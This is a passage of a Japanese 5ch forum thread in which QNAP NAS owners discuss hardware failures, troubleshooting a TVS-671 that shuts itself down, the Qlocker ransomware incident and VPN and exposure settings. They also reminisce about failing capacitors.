正直、管理がよくなっているとは思う。コレ重要。
だけど、バックアップ用エンクロージャが(TL-D800C)認識出来なかったり(ファイルシステム違うからなぁ)で、システム元通りにするのが地獄。
QTSも階層化が魅力だし...個人・小規模用途なら、今まで通りQTSなのかなぁ
920不明なデバイスさん (ワッチョイ 0f5f-rZ8O)
2021/05/16(日) 21:41:06.19ID:ZXSe5XXW0 そういや先日myqnapcloudのアプリアップデートした時、myqnapcloudlinkが勝手にonに切り替わってたような
921不明なデバイスさん (ワッチョイ 115f-Ew1A)
2021/05/17(月) 02:13:47.14ID:uTyHgKMH0 httpsも開けない方がいいだろ
922不明なデバイスさん (ワッチョイ 7302-A9Py)
2021/05/17(月) 06:43:03.46ID:rAVRHU1q0 目の前でTS-453Beが壊れた。
ファイル移動をガリガリやらせてたら「ガシュ」と聞いたことのないHDDやっちまった感じの電源断で、ACアダプタ指し直してもSTATUS赤点灯→赤点滅。ビーと鳴る気配すらなし。ファンもHDDも回る気配なし。
こりゃ修理しかないかなあ
ファイル移動をガリガリやらせてたら「ガシュ」と聞いたことのないHDDやっちまった感じの電源断で、ACアダプタ指し直してもSTATUS赤点灯→赤点滅。ビーと鳴る気配すらなし。ファンもHDDも回る気配なし。
こりゃ修理しかないかなあ
923不明なデバイスさん (ワッチョイ 2b48-3zwU)
2021/05/17(月) 08:17:04.47ID:MYfpwemC0 そんな壊れ方見たことない
924不明なデバイスさん (ワッチョイ 7302-A9Py)
2021/05/17(月) 08:46:59.77ID:rAVRHU1q0 症状からして電源回りぽい…
尼のプライムデー2018.12に買った履歴がある。2年半かあ、もうちょい頑張ってほしいけど10GBe化したかったんで潮時かな…修理代次第だけど直してオクかな
尼のプライムデー2018.12に買った履歴がある。2年半かあ、もうちょい頑張ってほしいけど10GBe化したかったんで潮時かな…修理代次第だけど直してオクかな
925不明なデバイスさん (テテンテンテン MM17-N/QC)
2021/05/17(月) 08:53:10.96ID:T35haLnmM ガシュってなんだろ。コンデンサ?
926不明なデバイスさん (ワッチョイ 7302-A9Py)
2021/05/17(月) 09:12:58.00ID:rAVRHU1q0 HDDがガリガリ動いてるところへの電源断でヘッドとプラッタ回りからの音がしたって感じ…(もちろんNASのどこかなんてわからんが)ぶっちゃけ恐くて開腹もHDDをお立ち台につないだりもできてない…
HDDは幸いバックアップが生きてるから、心の整理ができたら順次確認してく
HDDは幸いバックアップが生きてるから、心の整理ができたら順次確認してく
927不明なデバイスさん (アウアウクー MM23-lU/s)
2021/05/17(月) 09:37:34.11ID:Jmdom3LZM それってHDD交換すればええんと違うんな
928不明なデバイスさん (テテンテンテン MM17-v+Lc)
2021/05/17(月) 10:32:46.92ID:YfntljEaM そういうのがあるとハードウェア暗号化って怖いよね
929不明なデバイスさん (スフッ Sd2f-/gQn)
2021/05/17(月) 11:03:22.52ID:cTplq7cYd 普通はNAS以外にバックアップ有るだろ
無いのに暗号化とか、お前はなにを守りたいんだと
無いのに暗号化とか、お前はなにを守りたいんだと
930不明なデバイスさん (ワッチョイ 6b63-Adon)
2021/05/17(月) 11:37:45.96ID:owj7KgHm0 識者に質問ですがTS453Dで10GBカードを追加した場合に
2.5Gが2ポート余るのですがハブのように他の機器を接続して活用する方法とかありますか?
2.5Gが2ポート余るのですがハブのように他の機器を接続して活用する方法とかありますか?
931不明なデバイスさん (ワッチョイ 6136-y06/)
2021/05/17(月) 11:44:48.06ID:5CnPvZc50932不明なデバイスさん (ワッチョイ 895f-fy9k)
2021/05/17(月) 12:48:30.58ID:ivsd3GR/0 めちゃくちゃ安いジャンクのHDD買ってきたらリアロケーション回数が黄色信号レベルまで来てるだけで他は問題なさそう。
RAID5で運用して自然死するところを見届けたい。
RAID5で運用して自然死するところを見届けたい。
933不明なデバイスさん (ワッチョイ 17b4-TVsO)
2021/05/17(月) 14:01:34.78ID:4awYI6pC0 死ぬ可能性が高いのなら、RAID1の方が安全じゃないか。
934不明なデバイスさん (ワッチョイ 2b48-3zwU)
2021/05/17(月) 14:07:03.34ID:MYfpwemC0 いやたまたまHDD稼働中に死んだってだけで、もうNAS自体起動できないんだから故障したんだろ
935不明なデバイスさん (アウアウウー Sa2d-F1Ot)
2021/05/17(月) 14:59:02.21ID:SSfYeqtQa 買い換える口実できたね
936不明なデバイスさん (ブーイモ MM5b-tJxf)
2021/05/17(月) 16:28:16.14ID:7lLtDBHJM937不明なデバイスさん (スッップ Sd2f-kJmT)
2021/05/17(月) 16:36:09.61ID:ThsyAqqTd QNAPが他社NASへのバックアップも検討するように推奨してるのか
もうこの会社おしまいだな(笑)
もうこの会社おしまいだな(笑)
938不明なデバイスさん (ブーイモ MM5b-tJxf)
2021/05/17(月) 16:42:23.41ID:Z8n2Go3ZM リンク貼り損ねた
QlockerランサムウェアについてのQNAPからのお知らせ
https://www.qnap.com/static/landing/2021/qlocker/response/ja-jp/
QlockerランサムウェアについてのQNAPからのお知らせ
https://www.qnap.com/static/landing/2021/qlocker/response/ja-jp/
942不明なデバイスさん (ワッチョイ 3bab-pswo)
2021/05/17(月) 19:34:17.03ID:VacmgYL80 他にまともなNASはないんか?
943不明なデバイスさん (ワッチョイ 35ca-l6Yz)
2021/05/17(月) 19:52:11.92ID:vvoi+XzW0 QNAPとSynologyじゃないやつでまともなメーカーってあったっけ?
944不明なデバイスさん (ワッチョイ 477d-Adon)
2021/05/17(月) 20:03:03.13ID:4PM/ji980 そのうちランサムウェアにやたら強いNASとかルータがきっと出て来ると思う
まあそこが怪しいのではともいえるかもしれないが...
まあそこが怪しいのではともいえるかもしれないが...
945不明なデバイスさん (ワッチョイ d1ca-2wQ/)
2021/05/17(月) 20:04:54.26ID:JSDhIujZ0 イタチごっこは続く
947不明なデバイスさん (ワッチョイ f773-OEc3)
2021/05/17(月) 20:05:58.55ID:PqlHKpRV0 今回の件はQNAPがザルだったのか敵がスゴかったのか、どっちなの?
948不明なデバイスさん (ワッチョイ 9379-gSvD)
2021/05/17(月) 20:10:52.26ID:xKibprs70949不明なデバイスさん (ワッチョイ 51ad-Adon)
2021/05/17(月) 20:16:04.62ID:tljYpXYc0 みんなVPN使っているの?
950不明なデバイスさん (ワッチョイ 6136-sqPz)
2021/05/17(月) 20:55:11.62ID:5CnPvZc50951不明なデバイスさん (ワッチョイ 35ca-l6Yz)
2021/05/17(月) 21:24:20.45ID:vvoi+XzW0 今どきPPTP使うガイジいるの?
無線LANでWEPを開放するぐらい怖い
無線LANでWEPを開放するぐらい怖い
953不明なデバイスさん (ワッチョイ 5b10-0qpL)
2021/05/17(月) 22:48:13.29ID:6Jegdx4t0 OpenVPN使ってたけど、今回の件でYAMAHAのVPNルーター検討してる
NASがVPNサーバーになるとか最高!って思ってたけどね
自分のレベルじゃ原因とかよーわからんのでルーターで止めるのが正解なんじゃないかと
とりあえずはQSyncがメインの運用なんで、もう少しはっきりするまで
たまに電源付けてシンクロ出来たらシャットダウンで運用中
NASがVPNサーバーになるとか最高!って思ってたけどね
自分のレベルじゃ原因とかよーわからんのでルーターで止めるのが正解なんじゃないかと
とりあえずはQSyncがメインの運用なんで、もう少しはっきりするまで
たまに電源付けてシンクロ出来たらシャットダウンで運用中
954不明なデバイスさん (ワッチョイ 61f5-ibyw)
2021/05/18(火) 00:10:02.98ID:v5w2HMsm0 うちはL2TP/IPSECにsoftether(ラズパイ)、SSL-VPNでfortigateで第2要素暗証で乱数トークン使ってる。
流石にNASにVPNまでさせる勇気はない…
流石にNASにVPNまでさせる勇気はない…
955不明なデバイスさん (ワッチョイ 5310-sort)
2021/05/18(火) 00:13:34.49ID:MFvtxq3B0 YAMAHAのルータってOpenVPN使えないよね 回線がtransixはもちろんmap-eでもダメじゃん
IPv4 PPoEなら問題ないけど
ちな Video Station -> Media Console > HBS3ときて次はQSyncあたりが狙われると予想
IPv4 PPoEなら問題ないけど
ちな Video Station -> Media Console > HBS3ときて次はQSyncあたりが狙われると予想
956不明なデバイスさん (ワッチョイ 6110-++C3)
2021/05/18(火) 03:26:11.06ID:YUmVziF30 YAMAHAのRTX830買ったけどそこはまあ理解してる
OCNもSo-netもIPv4同時提供してるしまあ困ることは無かろうという見込み
OCNもSo-netもIPv4同時提供してるしまあ困ることは無かろうという見込み
957不明なデバイスさん (ワッチョイ f156-DlG4)
2021/05/18(火) 15:51:51.54ID:VNWyKjQi0 バックアップ戦略にHBSが便利ってのが売りだったのになんだかなあって感じ
958不明なデバイスさん (ワッチョイ 2d5f-EthD)
2021/05/18(火) 18:16:19.64ID:nbNdWQJ80 NASのVM上で
SoftetherVPNのopenVPNを動かしてる
v6通るので便利ですよ
SoftetherVPNのopenVPNを動かしてる
v6通るので便利ですよ
959不明なデバイスさん (ワッチョイ 6340-Ju5X)
2021/05/18(火) 19:48:43.46ID:2JXkMpmH0 結局の所今QNAPのnas買ってもいいのですか?対策すれば問題無いのかな?
960不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/18(火) 20:32:56.04ID:2cr3UYJA0 基本的にルーターのUPnPをオフにしてmyqnapcloudを使わないようにして
インターネットにNASを公開しないようにすればいいいいと思うけど
急ぎでなければもう少し様子見ればいいんじゃない?
インターネットにNASを公開しないようにすればいいいいと思うけど
急ぎでなければもう少し様子見ればいいんじゃない?
961不明なデバイスさん (ワッチョイ 47a9-tcnD)
2021/05/18(火) 20:42:19.57ID:4oE32xA60 PhotoRec使って復旧試みてるけど48時間経過しても一向に終わる気配がない。
2TBのHDDを4つ使ってるだけなんだけど、こんなに時間掛かるもんなのかな?
2TBのHDDを4つ使ってるだけなんだけど、こんなに時間掛かるもんなのかな?
962不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/18(火) 21:00:13.10ID:7n7Dz1/jM >>809です
その後、再起動病が酷くなって起動すらしない羽目に
電源入れるとsystem bootingでずっと終わらない、起動中のプッという短いビープ音も鳴らない
拡張カードを抜く、HDD全部抜く、ハードリセットSW押す、メモリ交換、ボタン電池抜く、全部ダメ
全部抜いた状態で半日放置してもダメ
ステータスランプは電源入れて一秒緑→赤→消灯でHDD付けてても同じ
HDDがスピンアップしている様子がない
ダメ元でqnapで使用していないHDDを一個だけ繋いで電源入れたらスピンアップした上で認識して落ちた
その後、全部抜いて起動させBIOS画面が出るのを確認して元々使ってたHDD、SSDを挿し直し
再起動病状態に戻った後、一旦わざとキーボードでBIOS画面に入った後、再起動させると安定、NASの表示部分にファームバージョンが出るまでは回復
なんなんだコイツは
その後、再起動病が酷くなって起動すらしない羽目に
電源入れるとsystem bootingでずっと終わらない、起動中のプッという短いビープ音も鳴らない
拡張カードを抜く、HDD全部抜く、ハードリセットSW押す、メモリ交換、ボタン電池抜く、全部ダメ
全部抜いた状態で半日放置してもダメ
ステータスランプは電源入れて一秒緑→赤→消灯でHDD付けてても同じ
HDDがスピンアップしている様子がない
ダメ元でqnapで使用していないHDDを一個だけ繋いで電源入れたらスピンアップした上で認識して落ちた
その後、全部抜いて起動させBIOS画面が出るのを確認して元々使ってたHDD、SSDを挿し直し
再起動病状態に戻った後、一旦わざとキーボードでBIOS画面に入った後、再起動させると安定、NASの表示部分にファームバージョンが出るまでは回復
なんなんだコイツは
963不明なデバイスさん (ワッチョイ b19b-u+PU)
2021/05/18(火) 21:13:20.78ID:1PwmLkwb0 QTS 4.5.3.1670 Build 20210515
https://www.qnap.com/ja-jp/release-notes/qts/4.5.3.1670/20210515
https://www.qnap.com/ja-jp/release-notes/qts/4.5.3.1670/20210515
964不明なデバイスさん (アウアウウー Saaf-Ju5X)
2021/05/18(火) 22:09:08.41ID:hWxhx1BJa >>960
なんとなくromっていて最新バージョンにすればいいんでしょ(ハナホジーぐらいに思ってたけど問題はもっと深刻みたいですね…
なんとなくromっていて最新バージョンにすればいいんでしょ(ハナホジーぐらいに思ってたけど問題はもっと深刻みたいですね…
965不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/18(火) 22:35:28.65ID:2cr3UYJA0 >>962
BIOS画面まで出るのならmemtestをやってみるとかBIOSを更新してみるとか
BIOS画面まで出るのならmemtestをやってみるとかBIOSを更新してみるとか
966不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/18(火) 23:17:20.10ID:7n7Dz1/jM >>965
memtestは通りました。
biosよく探したらあった、ユーティリティ欄に埋もれてメチャメチャ分かりづらい上にTS671って型番誤植してる
自作用マザーだとBIOSは分かれてるのにこれは酷い
ありがとう、やってみます
memtestは通りました。
biosよく探したらあった、ユーティリティ欄に埋もれてメチャメチャ分かりづらい上にTS671って型番誤植してる
自作用マザーだとBIOSは分かれてるのにこれは酷い
ありがとう、やってみます
967不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/18(火) 23:29:44.39ID:2cr3UYJA0968不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/19(水) 00:03:27.39ID:b+uXR37kM >>967
本当にありがとう。
BIOS更新でquickbootがデフォでONになってるせいか起動が早くなった
ただ、勝手にシャットダウン病は変わらず。
シャットダウンする時はNASHDDのランプの一部が激しく点滅(毎回場所はランダム)で、NAS本体は応答なしになり
NASステータス見る画面も操作が効かなくなる
本当にありがとう。
BIOS更新でquickbootがデフォでONになってるせいか起動が早くなった
ただ、勝手にシャットダウン病は変わらず。
シャットダウンする時はNASHDDのランプの一部が激しく点滅(毎回場所はランダム)で、NAS本体は応答なしになり
NASステータス見る画面も操作が効かなくなる
969不明なデバイスさん (ワッチョイ 0f5f-Adon)
2021/05/19(水) 00:27:20.33ID:jCVeruut0970不明なデバイスさん (ワッチョイ bf36-y06/)
2021/05/19(水) 02:27:34.54ID:oVO18Sg10971不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/19(水) 08:19:35.88ID:kaRL1R8fM >>970
BIOS画面やmemtest中は一切落ちないので物理的なスイッチは大丈夫
温度も、通常の状態で最高40度台で落ちてるしmemtest中の方が温度が高い
電源交換しても症状変わらずなので、もうマザーがおかしいぐらいしか…
BIOS画面やmemtest中は一切落ちないので物理的なスイッチは大丈夫
温度も、通常の状態で最高40度台で落ちてるしmemtest中の方が温度が高い
電源交換しても症状変わらずなので、もうマザーがおかしいぐらいしか…
972不明なデバイスさん (ブーイモ MM5b-DQHz)
2021/05/19(水) 10:35:44.82ID:eD5+H9GnM973不明なデバイスさん (ワッチョイ 2b48-3zwU)
2021/05/19(水) 12:05:26.89ID:lOTG7V7s0 基盤側の電源回りじゃないの
974不明なデバイスさん (ワッチョイ 015f-vH/O)
2021/05/19(水) 12:57:59.04ID:APIpacPn0 DNS周りはやっぱりバグだったのか
今回はFixed a security issueがあったからリリースされて速攻入れたけどうちは大丈夫ぽい
今回はFixed a security issueがあったからリリースされて速攻入れたけどうちは大丈夫ぽい
975不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/19(水) 15:10:48.87ID:oVO18Sg10 メモリを単体でスロット変えてもダメなら、もうマザーボードくらいしか
落ちるあたりでコンソール画面に何か出力されていないかな
落ちるあたりでコンソール画面に何か出力されていないかな
976不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/20(木) 10:16:57.86ID:j1r5YCHGM 色々ありがとう
コンソールの方も同様に急に応答が無くなります。
特に原因が書いてある怪しいログは出ずです。
マザー故障が80%だけど、ひょっとしたらUSB直結のファーム等入っている本体ストレージが怪しいかも?
memtestやbios画面等、ファームウェアを読み込む前の段階では落ちません。
memtest一晩回したけど落ちず。
本体上では、起動している数分間で何とか最新20210515には見た目正常にアップデート出来たけど症状は変わらず
web上でQnapログイン後デスクトップ画面に行って数分で突然シャットダウン
調子悪い時は起動中にシャットダウン
コンソールの方も同様に急に応答が無くなります。
特に原因が書いてある怪しいログは出ずです。
マザー故障が80%だけど、ひょっとしたらUSB直結のファーム等入っている本体ストレージが怪しいかも?
memtestやbios画面等、ファームウェアを読み込む前の段階では落ちません。
memtest一晩回したけど落ちず。
本体上では、起動している数分間で何とか最新20210515には見た目正常にアップデート出来たけど症状は変わらず
web上でQnapログイン後デスクトップ画面に行って数分で突然シャットダウン
調子悪い時は起動中にシャットダウン
977不明なデバイスさん (ワッチョイ dfad-Qmtv)
2021/05/20(木) 10:45:20.86ID:/wjI0Ddb0 勝手に落ちるのなんでだぜ病のTVS-671の人はもう十分にいろいろ探ってるし
あとは修理と買い替えのどちらがいいかじゃないでしょうか
手元の作業で元気になってくれたら何よりなんですけどね
あとは修理と買い替えのどちらがいいかじゃないでしょうか
手元の作業で元気になってくれたら何よりなんですけどね
978不明なデバイスさん (テテンテンテン MM17-uaMN)
2021/05/20(木) 14:32:45.50ID:uqTFzBGPM 最後の希望として、本体USBストレージ領域の損傷を疑ってますが、ここがイカれてた場合USBメモリ外付けで復旧は難しいでしょうか?
一時的な復旧には使えるけど恒久的な使用は無理そうですが
すいません色々
一時的な復旧には使えるけど恒久的な使用は無理そうですが
すいません色々
979不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/20(木) 17:53:47.84ID:bB6ztNAs0 http://wiki.qnap.com/wiki/Firmware_Recovery
https://www.forcemedia.co.jp/support/qa/qnap/002010.html
DOMイメージのインストールをやってみたら?imgのサイズが倍くらいある
とどめを刺すかもしれないけど(^_^;
あとは自分だったらLinuxインストールしてみて動くかどうか確かめてみるなw
https://www.forcemedia.co.jp/support/qa/qnap/002010.html
DOMイメージのインストールをやってみたら?imgのサイズが倍くらいある
とどめを刺すかもしれないけど(^_^;
あとは自分だったらLinuxインストールしてみて動くかどうか確かめてみるなw
980不明なデバイスさん (ワッチョイ c768-Adon)
2021/05/20(木) 20:57:33.74ID:l4h70J7K0 >>978
USBメモリをDOMの所に接続してリカバリすればQTSで起動しますよ
以前にTS-453Aで一時期使ってた事があります
ただ、メモリのメーカーチェックされているのかDOMと完全に同一の動きはしませんでした
QNAPCloudが再起動の度毎回ログイン要だったり
今はApacerのDOMを入手したので復活しています
USBメモリをDOMの所に接続してリカバリすればQTSで起動しますよ
以前にTS-453Aで一時期使ってた事があります
ただ、メモリのメーカーチェックされているのかDOMと完全に同一の動きはしませんでした
QNAPCloudが再起動の度毎回ログイン要だったり
今はApacerのDOMを入手したので復活しています
981不明なデバイスさん (ワッチョイ f1f6-4VYy)
2021/05/20(木) 22:49:05.93ID:15ekrbel0 >>976
https://www.google.com/amp/s/ascii.jp/elem/000/000/032/32723/amp/
電源関係だと、熱で寿命が来てしまうコンデンサもあったり。
接続等が色々正常そうなら、コンデンサが妊娠していないかも確認してみては。
以前このような事に出くわしてから、不可思議なシャットダウンはコンデンサを見るようにしてる。。
案の定膨らんでたりするから。。
当時は煙が出て、火事になるかと思った。
https://www.google.com/amp/s/ascii.jp/elem/000/000/032/32723/amp/
電源関係だと、熱で寿命が来てしまうコンデンサもあったり。
接続等が色々正常そうなら、コンデンサが妊娠していないかも確認してみては。
以前このような事に出くわしてから、不可思議なシャットダウンはコンデンサを見るようにしてる。。
案の定膨らんでたりするから。。
当時は煙が出て、火事になるかと思った。
982981 (ワッチョイ f1f6-4VYy)
2021/05/20(木) 22:51:45.17ID:15ekrbel0 以前と言ったけど、Pentium4搭載機や10年くらい前のPCの話で、
Q様ではまだ見たことがないので大丈夫だと思うけど、念の為確認でした。
すみません。
Q様ではまだ見たことがないので大丈夫だと思うけど、念の為確認でした。
すみません。
983不明なデバイスさん (ワッチョイ bba5-u+PU)
2021/05/20(木) 23:10:51.05ID:bClEoUuI0 エロ動画が全部暗号化されてもうた・・・
俺の熟女コレクションがw
俺の熟女コレクションがw
984不明なデバイスさん (ワッチョイ bf36-sqPz)
2021/05/20(木) 23:45:03.30ID:bB6ztNAs0 今はやりのランサムウェアの対象が20MB以下だから
これからは高画質でサイズが大きい動画をコレクション
するといいと思いますよ
これからは高画質でサイズが大きい動画をコレクション
するといいと思いますよ
985不明なデバイスさん (ワッチョイ f101-E1vk)
2021/05/20(木) 23:46:38.10ID:BsDKmZpS0986不明なデバイスさん (ワッチョイ b668-O4So)
2021/05/21(金) 00:14:01.40ID:CsiguOFW0 自作でintel cpu買ったのは後にも先にも北森だけだったな
最初に買ったのは6x86やった
今でこそamdはタメ張ってるけど、phenom1-2時代は苦しかったなw
最初に買ったのは6x86やった
今でこそamdはタメ張ってるけど、phenom1-2時代は苦しかったなw
987不明なデバイスさん (ワッチョイ 9a4b-5O72)
2021/05/21(金) 00:45:43.82ID:B8/B2lRP0 標準以外のフォルダは無事だった。
988不明なデバイスさん (ワッチョイ 33bb-7S+s)
2021/05/21(金) 10:09:22.88ID:aoP8UzGt0989不明なデバイスさん (ワッチョイ 7602-m1Ls)
2021/05/21(金) 11:49:47.85ID:eTn2NFx20 電解コンはOSコンだろうとなんだろうと温度仕様と使用する温度に左右される
気温が高い部屋とか空気の通りの悪い場所に設置すれば寿命が短くなる
気温が高い部屋とか空気の通りの悪い場所に設置すれば寿命が短くなる
991不明なデバイスさん (ワッチョイ 33f1-4P7j)
2021/05/21(金) 13:34:03.27ID:w4Z3ZnU70 固体とか電解液とかいう話というか、
コンデンサの品質が重要なセールス因子になるようになったという感じでしょうか。
粗悪品使ってコスト削減するくらいなら、
高品質のものを使って売り文句にしたほうがメリットが大きい。
それくらい市場がマニア向けに傾いたというか。
タケノコ事件とか電解液のコンデンサだからというよりは粗悪品を使ったという話なのに
何でもかんでも電解液のコンデンサはダメというか固体ならOKみたいな風潮になったしねぇ。
メーカー不詳の固体コンデンサ採用と日本産有名メーカー製の電解液のコンデンサ採用。
それ以外同じ仕様の製品が有ったとしたらどっちが売れるかなぁ。
コンデンサの品質が重要なセールス因子になるようになったという感じでしょうか。
粗悪品使ってコスト削減するくらいなら、
高品質のものを使って売り文句にしたほうがメリットが大きい。
それくらい市場がマニア向けに傾いたというか。
タケノコ事件とか電解液のコンデンサだからというよりは粗悪品を使ったという話なのに
何でもかんでも電解液のコンデンサはダメというか固体ならOKみたいな風潮になったしねぇ。
メーカー不詳の固体コンデンサ採用と日本産有名メーカー製の電解液のコンデンサ採用。
それ以外同じ仕様の製品が有ったとしたらどっちが売れるかなぁ。
992不明なデバイスさん (ワッチョイ b668-O4So)
2021/05/21(金) 14:19:06.50ID:BjWpgPwo0 クソ高かったナナオの液晶モニタの電源入らなくなったジャンクを格安で買って、
1個数十円の電解コンデンサを数本交換するだけで再生できたんで、
俺としては美味しい騒動やったな
死蔵してたABITのママン数枚ももれなくお漏らししてて全部整備済品に交換してもらって結構な高音で捌けたし
1個数十円の電解コンデンサを数本交換するだけで再生できたんで、
俺としては美味しい騒動やったな
死蔵してたABITのママン数枚ももれなくお漏らししてて全部整備済品に交換してもらって結構な高音で捌けたし
993不明なデバイスさん (ワッチョイ 0390-cE2x)
2021/05/21(金) 14:25:05.67ID:URLUjwJg0 ABITて
いつの時代だよ
いつの時代だよ
994不明なデバイスさん (ワッチョイ 0e68-O4So)
2021/05/21(金) 15:31:56.89ID:U6n17Rpz0 そのコンデンサ騒動が2000年前後だからな
995不明なデバイスさん (ワッチョイ b66d-Q5+W)
2021/05/21(金) 15:33:55.24ID:SNP+8QuU0 タケノコ事件て何ですか?
996不明なデバイスさん (ワッチョイ 0e68-O4So)
2021/05/21(金) 15:46:31.61ID:U6n17Rpz0 タケノコ事件って表現は初めて聞いたけど、
2000年前後の台湾製電解コンデンサお漏らし大量発生のことだと思われ
漏れ方に寄るが天板突き破って中身がニョッキすることもあったからな
>>991
元々電解コンデンサの寿命は使わなくても10年くらいなんで、
寿命の長い固体コンデンサ使用は商品として魅力あるだろ
2000年前後の台湾製電解コンデンサお漏らし大量発生のことだと思われ
漏れ方に寄るが天板突き破って中身がニョッキすることもあったからな
>>991
元々電解コンデンサの寿命は使わなくても10年くらいなんで、
寿命の長い固体コンデンサ使用は商品として魅力あるだろ
997不明なデバイスさん (ワッチョイ 3336-DmKs)
2021/05/21(金) 15:57:04.26ID:OjUbp8iN0 QTS4.5.3 1670 に上げたんだけど、目玉のカスタム HTTP Serverヘッダーを設定してみたけど
Apacheのままで変わらない、この設定ってどこの動作に反映されるんだろう?
Apacheのままで変わらない、この設定ってどこの動作に反映されるんだろう?
998不明なデバイスさん (ワッチョイ 4e10-e3Lj)
2021/05/21(金) 16:57:29.81ID:AduzpHLU0 なさそうだったんで立てた
不備があったらごめん
【静音・高機能NAS】QNAP part57【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1621583752/
不備があったらごめん
【静音・高機能NAS】QNAP part57【自宅サーバ】
https://mevius.5ch.net/test/read.cgi/hard/1621583752/
1000不明なデバイスさん (ワッチョイ 7a23-c8zY)
2021/05/21(金) 17:12:08.75ID:7sLcMyPX0 梅
10011001
Over 1000Thread このスレッドは1000を超えました。
新しいスレッドを立ててください。
life time: 29日 1時間 13分 24秒
新しいスレッドを立ててください。
life time: 29日 1時間 13分 24秒
10021002
Over 1000Thread 5ちゃんねるの運営はプレミアム会員の皆さまに支えられています。
運営にご協力お願いいたします。
───────────────────
《プレミアム会員の主な特典》
★ 5ちゃんねる専用ブラウザからの広告除去
★ 5ちゃんねるの過去ログを取得
★ 書き込み規制の緩和
───────────────────
会員登録には個人情報は一切必要ありません。
月300円から匿名でご購入いただけます。
▼ プレミアム会員登録はこちら ▼
https://premium.5ch.net/
▼ 浪人ログインはこちら ▼
https://login.5ch.net/login.php
運営にご協力お願いいたします。
───────────────────
《プレミアム会員の主な特典》
★ 5ちゃんねる専用ブラウザからの広告除去
★ 5ちゃんねるの過去ログを取得
★ 書き込み規制の緩和
───────────────────
会員登録には個人情報は一切必要ありません。
月300円から匿名でご購入いただけます。
▼ プレミアム会員登録はこちら ▼
https://premium.5ch.net/
▼ 浪人ログインはこちら ▼
https://login.5ch.net/login.php
レス数が1000を超えています。これ以上書き込みはできません。
ニュース
- 🇺🇸🇨🇳米中関係は「極めて強固」とトランプ氏… ★5 [BFU★]
- SuicaとPASMOのコード決済「teppay(テッペイ)」26年秋開始 🐧🤖 [少考さん★]
- 🇺🇸🇨🇳米中関係は「極めて強固」とトランプ氏… ★6 [BFU★]
- 【SNSでも政策の無駄募る】政府が新設 政策の財源探し 税制優遇など「見直し担当室」… [BFU★]
- 「ホストに貢ぎたい」と海外で売春する日本人女性 2カ月で2千万円稼ぐケースも [1ゲットロボ★]
- 【速報】外務次官が中国大使と面会 [蚤の市★]
- みろ、
- 山上母「統一教会に献金をしたことで兄も天国で幸せに暮らすことになった」 [268244553]
- 人を殺す予定だけ質問ある?
- 【♩悲報】NHK立花たかし、実刑へ。数年間ブタ箱。自殺した兵庫県議へ中傷で [732289945]
- 参政党・さや議員「日本ではデフォルトは起きません!なぜなら日本円はいくらでも刷れるからです!!!」 [931948549]
- 野ションで有名なあのトー横キッズ、今度はハメ撮りが拡散